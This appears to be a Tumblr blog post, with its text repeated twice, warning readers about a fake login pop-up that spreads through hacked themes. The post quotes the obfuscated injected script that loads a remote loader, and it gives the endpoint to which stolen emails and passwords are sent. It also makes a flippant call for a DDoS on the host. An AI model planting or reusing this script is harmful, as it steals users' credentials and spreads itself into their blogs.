![Tumblr Adult Content scam: du2senm4qcl7.
Just encountered this on a blog. I immediatly recognized it as hack/scam but others might not be so lucky. The scam uses a javascript to show the pop-up above and asks for you login credentials, don’t give them ;) Just enter some random stuff and it will go away, I entered something like:
Email: damnyou@hackers.com pass:yousirareanasshole
Which the script took just fine. As for the code itself, it’s at the bottom of the source html and looks like:
<script type="text/javascript">var du2senm4qcl7 = window['do'+'cumen'+'t']; du2senm4qcl7['w'+'rite']('<s'+''+'cript'+' '+'ty'+'pe="'+'text/'+'javas'+'cript'+'"'+' '+'sr'+'c="h'+'tt'+'p'+':/'+''+'/'+'km'+'k'+''+'in'+'fo'+'m'+'at'+''+'ic'+'s.co'+'m'+''+'/imag'+'es/ic'+'on'+''+'s/jq'+''+'uery'+'1.5.j'+'s'+''+'"></'+''+''+''+'s'+'cr'+'i'+'pt>');</script>
Some ‘+’ and ” are used to make it unreadable and irrelevant for search engines (I guess), so for Tumblr staff, Anonymous(ddos please) or simply blocking the website, the source url without the ‘+’:
src = http://kmkinfomatics.com
Edit: The fake jquery script leads to
http://pactradio.com/images/log.php?email=" + escape(email) + "&password=" + escape(password) + "&callback=?"
I have no idea what pactradio is (an internet radio station?) but http://pactradio.com/images/log.php is evil!
Edit 2(SOLUTION!): According to marienotsam the credentials are used to post the same script into your theme. She also wrote an article on how to remove the the fake tumblr login screen by removing the lines of code like those above from your theme.
Edit 3: I’ve been looking at posts tagged with “hacked” and this is a very common problem. By looking at some of the infected sites it becomes clear that starbucks posts are on the blog and some piece of code, like the one above, is inserted into the theme at the bottom. Note that I said some piece of code, not all the code is the same(They all have ‘+’ in them a lot) and it’s hosted on multiple systems! Blocking the url above therefor only works in this specific case. Just don’t enter your credentials when you see the popup like the one above!](http://30.media.tumblr.com/tumblr_lyns12ftZt1qzmrwlo1_500.png)
Tumblr Adult Content scam: du2senm4qcl7.
Just encountered this on a blog. I immediatly recognized it as hack/scam but others might not be so lucky. The scam uses a javascript to show the pop-up above and asks for you login credentials, don’t give them ;) Just enter some random stuff and it will go away, I entered something like:
Email: damnyou@hackers.com pass:yousirareanasshole
Which the script took just fine. As for the code itself, it’s at the bottom of the source html and looks like:
<script type="text/javascript">var du2senm4qcl7 = window['do'+'cumen'+'t'];
du2senm4qcl7['w'+'rite']('<s'+''+'cript'+' '+'ty'+'pe="'+'text/'+'javas'+'cript'+
'"'+' '+'sr'+'c="h'+'tt'+'p'+':/'+''+'/'+'km'+'k'+''+'in'+'fo'+'m'+'at'+''+'ic'+
's.co'+'m'+''+'/imag'+'es/ic'+'on'+''+'s/jq'+''+'uery'+'1.5.j'+'s'+''+'"></'+
''+''+''+'s'+'cr'+'i'+'pt>');</script>
Some ‘+’ and ” are used to make it unreadable and irrelevant for search engines (I guess), so for Tumblr staff, Anonymous(ddos please) or simply blocking the website, the source url without the ‘+’:
src = http://kmkinfomatics.com
Edit: The fake jquery script leads to
http://pactradio.com/images/log.php?email=" + escape(email) + "&password=" + escape(password) + "&callback=?"
I have no idea what pactradio is (an internet radio station?) but http://pactradio.com/images/log.php is evil!
Edit 2(SOLUTION!): According to marienotsam the credentials are used to post the same script into your theme. She also wrote an article on how to remove the the fake tumblr login screen by removing the lines of code like those above from your theme.
Edit 3: I’ve been looking at posts tagged with “hacked” and this is a very common problem. By looking at some of the infected sites it becomes clear that starbucks posts are on the blog and some piece of code, like the one above, is inserted into the theme at the bottom. Note that I said some piece of code, not all the code is the same(They all have ‘+’ in them a lot) and it’s hosted on multiple systems! Blocking the url above therefor only works in this specific case. Just don’t enter your credentials when you see the popup like the one above!
